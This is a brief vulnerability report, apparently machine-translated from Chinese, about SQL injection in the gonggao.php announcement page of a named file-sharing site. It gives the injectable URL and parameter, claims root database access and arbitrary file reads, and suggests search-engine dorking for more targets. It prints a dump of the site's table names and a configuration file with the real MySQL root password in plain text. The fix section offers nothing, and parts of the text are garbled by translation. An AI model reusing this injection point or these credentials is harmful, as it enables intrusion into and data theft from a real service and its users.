Author: I have gone
Brief description:
Everyone knows a piece of pork at the announcement
Detailed description:
Http://www.126disk.com/gonggao.php? Id = 4
Root permission. You can view the disk database or load file to read arbitrary files, such as database configuration files.
Http://www.126disk.com/gonggao.php? Id =-4 The path can be cracked. In fact, you can find a lot of warning with google site. I don't know how many people are taking off, right?
Proof of vulnerability:
Inject: www.2cto.com
Database: 126 disk
[24 tables]
+ ------------------ +
| Disk_admin |
| Disk_adminlog |
| Disk_adminmsg |
| Disk_collection |
| Disk_count |
| Disk_file |
| Disk_gonggao |
| Disk_guolv |
| Disk_haoyou |
| Disk_integral |
| Disk_integrallog |
| Disk_jubao |
| Disk_link |
| Disk_links |
| Disk_message |
| Disk_mulu |
| Disk_search |
| Disk_server |
| Disk_tag |
| Disk_type |
| Disk_user |
| Disk_userlog |
| Disk_visitors |
| Disk_zhuanji |
+ ------------------ +
The structure of the 400disk database is basically the same as that of the 126disk database. It seems that the number of users is different.
Load file: class. php
$ Mysql_host = "localhost ";
$ Mysql_user = "root"; // user name used to connect to the database
$ Mysql_pass = "mysql.123! @#~ "; // Database connection password
$ Mysql_data = "126 disk"; // Database Name
$ Mysql_charset = "gbk ";
Solution:
You know